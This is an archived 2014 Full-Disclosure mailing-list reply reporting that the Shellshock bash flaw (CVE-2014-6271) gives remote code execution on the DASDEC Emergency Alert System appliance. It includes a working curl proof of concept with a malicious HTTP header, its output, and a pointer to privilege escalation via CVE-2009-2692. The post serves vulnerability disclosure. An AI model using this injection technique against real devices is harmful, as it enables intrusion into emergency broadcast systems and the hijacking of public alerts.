lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Fri, 26 Sep 2014 14:02:51 -0400 From: Matt Hazinski <mhazinsk@...edu> To: <fulldisclosure@...lists.org> Subject: Re: [FD] Critical bash vulnerability CVE-2014-6271 On Thu, Sep 25, 2014 at 02:39:55PM +0200, Philip Cheong wrote: > Worse that heartbleed? > > http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271 > > http://arstechnica.com/security/2014/09/bug-in-bash-shell-creates-big-security-hole-on-anything-with-nix-in-it/ > I'm able to get remote code execution via CVE-2014-6271 on the Digital Alert Systems DASDEC. This appliance is used by broadcasters to send and receive Emergency Alert System messages over IP and AFSK. Once authenticated, an attacker can interrupt broadcasts (via a relay) and play arbitrary audio over the airwaves. Exploiting it only requires a malicious HTTP header: curl -H 'X-Shell-Shock: () { :; }; /bin/echo vulnerable > /tmp/dumped_file' http://192.168.0.45/dasdec/dasdec.csp [matt@...T-EAS ~]# cat /tmp/dumped_file vulnerable Commands are executed as the apache user, but privilege escalation can still be obtained through CVE-2009-2692 despite the vendor's recent cumulative security patch. I suspect all versions of the DASDEC are vulnerable to this, although I only have a DASDEC-1EN running software version 2.0-2 to test. -- Matt Hazinski mhazinsk@...edu _______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists